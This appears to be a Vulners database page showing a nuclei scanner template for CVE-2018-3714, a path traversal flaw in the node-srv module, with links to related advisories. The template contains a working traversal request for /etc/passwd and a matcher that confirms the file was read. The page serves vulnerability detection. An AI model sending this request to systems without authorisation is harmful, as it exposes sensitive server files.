Lucene search
K

node-srv - Local File Inclusion

🗓️ 19 Jun 2026 11:10:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

node-srv - LFI Vulnerability, Read Sensitive Files, Unauthorized Acces

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
node-srv path traversal vulnerability
22 Jun 201800:00
cnvd
CVE
CVE-2018-3714
7 Jun 201802:00
cve
Cvelist
CVE-2018-3714
7 Jun 201802:00
cvelist
Github Security Blog
Path Traversal in node-srv
26 Jul 201814:50
github
Hacker One
Node.js third-party modules: [node-srv] Path Traversal allows to read arbitrary files from remote server
25 Jan 201820:00
hackerone
Node.js
Path Traversal
24 Apr 201815:43
nodejs
NVD
CVE-2018-3714
7 Jun 201802:29
nvd
OpenVAS
Generic HTTP Directory Traversal / File Inclusion (Web Dirs) - Active Check
22 Jul 202100:00
openvas
OSV
CVE-2018-3714
7 Jun 201802:29
osv
OSV
GHSA-52R9-G5G6-2HJP Path Traversal in node-srv
26 Jul 201814:50
osv
Rows per page
id: CVE-2018-3714

info:
  name: node-srv - Local File Inclusion
  author: madrobot
  severity: medium
  description: node-srv is vulnerable to local file inclusion due to lack of url validation, which allows a malicious user to read content of any file with known path.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the node-srv application.
  reference:
    - https://hackerone.com/reports/309124
    - https://nvd.nist.gov/vuln/detail/CVE-2018-3714
    - https://github.com/merlinepedra25/nuclei-templates
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2018-3714
    cwe-id: CWE-22
    epss-score: 0.08632
    epss-percentile: 0.94409
    cpe: cpe:2.3:a:node-srv_project:node-srv:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: node-srv_project
    product: node-srv
    framework: node.js
  tags: cve,cve2018,nodejs,lfi,hackerone,node-srv_project,node.js,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/node_modules/../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200e2fe3411872620a2c49009288b938c9bb866e68b4bd2f7bdf9153755f2b8bcf022100f3b5e0054fe671cce85fa271bf0440ec75200f24b657176a732cc5513f536d40:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 24
CVSS 3.16.5
EPSS0.08632
29